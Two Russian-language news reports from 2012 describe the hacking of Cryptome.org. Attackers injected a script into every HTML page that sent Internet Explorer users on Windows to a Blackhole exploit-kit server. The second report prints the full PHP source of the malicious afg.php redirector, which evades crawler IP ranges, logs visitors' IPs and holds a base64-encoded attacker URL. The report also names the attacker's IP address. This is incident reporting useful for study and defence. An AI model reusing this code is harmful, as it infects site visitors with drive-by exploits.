Известный западный интернет-проект Сryptome.org был взломан неизвестными хакерами, которые разместили вредоносные коды на всех основных веб-страницах проекта. На данный момент сайт недоступен, а всех обращающихся к проекту, сервер адресует на специальную страницу, где авторы сообщают, что проект пострадал от атаки и в ближайшие несколько часов он не будет доступен, так как администрация удаляет вредоносные коды и производит анализ системы. Напомним, что проект http://cryptome.org существует уже более 10 лет и публикует различные официальные документы, служебные записки и различные доклады, которые изначально не предназначались для публичного обнародования. Большая часть опубликованных документов, как правило, связана с теми или иными государственными ведомствами разных стран. Неофициально за проектом уже закрепился статус "рупора свободы слова в интернете". Также на сайте есть разделы по шифрованию и данные о том, как анонимно работать с теми или иными информационными материалами. Администрация сайта сообщила, что вредоносные скрипты были размещены на проекте в промежутке среды-воскресенья прошлой недели. И сейчас операторы проекта сузили круг анализа подозреваемых, ответственных за заражение системы, до 3000 IP-адресов. Известно, что заражение проводилось при помощи автоматизированных средств, так как за небольшой период времени злоумышленникам удалось заразить более тысячи страниц. На всех зараженных страницах взломщики разместили код, подгружающий набор эксплоитов, пытающихся взломать компьютер, подключающийся к сайту пользователя. Все современные антивирусы блокируют указанные эксплоиты. (03:01) 14.02.2012 http://cybersecurity.ru/crypto/144102.html
Blackhole добрался даже до легендарного сайта Cryptome.org Основанный в 1996 году, сайт Cryptome.org долгие годы был отличным хакерским ресурсом, где можно было узнать последние новости в области криптографии, массовой слежки, свободы слова, национальной безопасности, разведки и технологий двойного назначения, которые используют правительства и корпорации. Этот проект был предшественником Wikileaks — сюда выкладывались секретные государственные документы и протоколы, которые открывали истинное положение вещей в «самом демократическом» государстве мира. Сейчас на сайте собрано более 70 тыс. файлов, в том числе список предполагаемых агентов MI-6, фотографии экспертов-форенсиков после терактов 11/11, подробные карты правительственных учреждений США (сделанные на базе открытых источников, геодезия и аэрофотосъёмка), любительские снимки с войны в Ираке с тысячами убитых солдат и мирных жителей, руководство Microsoft по шпионажу и другие уникальные документы, некоторые из которых ранее нигде не публиковались. В общем, для создателей Cryptome.org не существовало авторитетов, и они продолжали свою работу даже после обысков ФБР, закрытия доступа несколькими провайдерами и «наездов» корпораций. Но несколько дней назад сайт всё-таки пришлось закрыть ненадолго. На одной из страниц был обнаружен скрипт, который перенаправлял пользователей на вредоносный сайт с набором эксплоитов Blackhole. IP-адрес этого сайта 65.75.137.243 и конкретный адрес http://65.75.137.243/Home/index.php за несколько дней до этого уже был занесён в «чёрный список» Symantec, и компания предложила сайту помощь в расследовании инцидента. Расследование показало, что заражённый файл ../0002/afg/afg.php появился 8 февраля в директории ../0002/afg/, вместе с новой поддиректорией ../0002/afg/main. Там, в свою очередь, оказалось 2863 файла .log с IP-адресами: 2.102.110.159.log 184.96.244.216.log Судя по всему, эти файлы были добавлены в период с 8 по 12 февраля и соответствуют IP-адресам посетителей сайта, которые запустили вредоносный скрипт. Дальнейшее расследование показало, что 8 февраля ссылка на скрипт SCRIPT src="/0002/afg/afg.php" была добавлена во все 6000 файлов в основной директории Cryptome. В итоге, заражённым оказался каждый HTML-файл на сайте Cryptome. В данный момент заканчивается очистка сайта от вредоносных скриптов. Содержимое вредоносного скрипта afg.php практически не отличается от ранее известных экземпляров того же типа (1, 2, 3). Code: function net_match ( $network , $ip ) { $ip_arr = explode ( '/' , $network ); $network_long = ip2long ( $ip_arr [ 0 ]); $x = ip2long ( $ip_arr [ 1 ]); $mask = long2ip ( $x ) == $ip_arr [ 1 ] ? $x : 0xffffffff << ( 32 - $ip_arr [ 1 ]); $ip_long = ip2long ( $ip ); return ( $ip_long & $mask ) == ( $network_long & $mask ); } function net() { $ip=$_SERVER['REMOTE_ADDR']; if( net_match('64.233.160.0/19',$ip)==0 && net_match('66.102.0.0/20',$ip)==0 && net_match('66.249.64.0/19',$ip)==0 && net_match('72.14.192.0/18',$ip)==0 && net_match('74.125.0.0/16',$ip)==0 && net_match('89.207.224.0/24',$ip)==0 && net_match('193.142.125.0/24',$ip)==0 && net_match('194.110.194.0/24',$ip)==0 && net_match('209.85.128.0/17',$ip)==0 && net_match('216.239.32.0/19',$ip)==0 && net_match('128.111.0.0/16',$ip)==0 && net_match('67.217.0.0/16',$ip)==0 && net_match('188.93.0.0/16',$ip)==0 ) return true; } function detect_os() { global $os; $user_agent = $_SERVER['HTTP_USER_AGENT']; if(strpos($user_agent, "Windows") !== false) $os = 'windows'; }detect_os(); function detect_brows() { global $OOOOO0000, $OOOOOO000; $user_agent = $_SERVER["HTTP_USER_AGENT"]; if (preg_match("/MSIE 6.0/", $user_agent) OR preg_match("/MSIE 7.0/", $user_agent) OR preg_match("/MSIE 8.0/", $user_agent) ) $OOOOOO000 = "MSIE"; }detect_brows(); $IP = $_SERVER['REMOTE_ADDR'].".log"; function _log() { global $IP; touch ("./main/{$IP}"); } @mkdir('main'); function _check() { global $IP; if(!file_exists("./main/{$IP}")) return true; } $dfjgkbl=base64_decode('aHR0cDovLzY1Ljc1LjEzNy4yNDMvSG9tZS9pbmRleC5waHA='); if(_check()) { if(net()) { if($os) { if($OOOOOO000 == "MSIE") { echo 'document.write(\'\');'; _log(); }}}} Дата: 14.02.2012 http://www.xakep.ru/post/58279/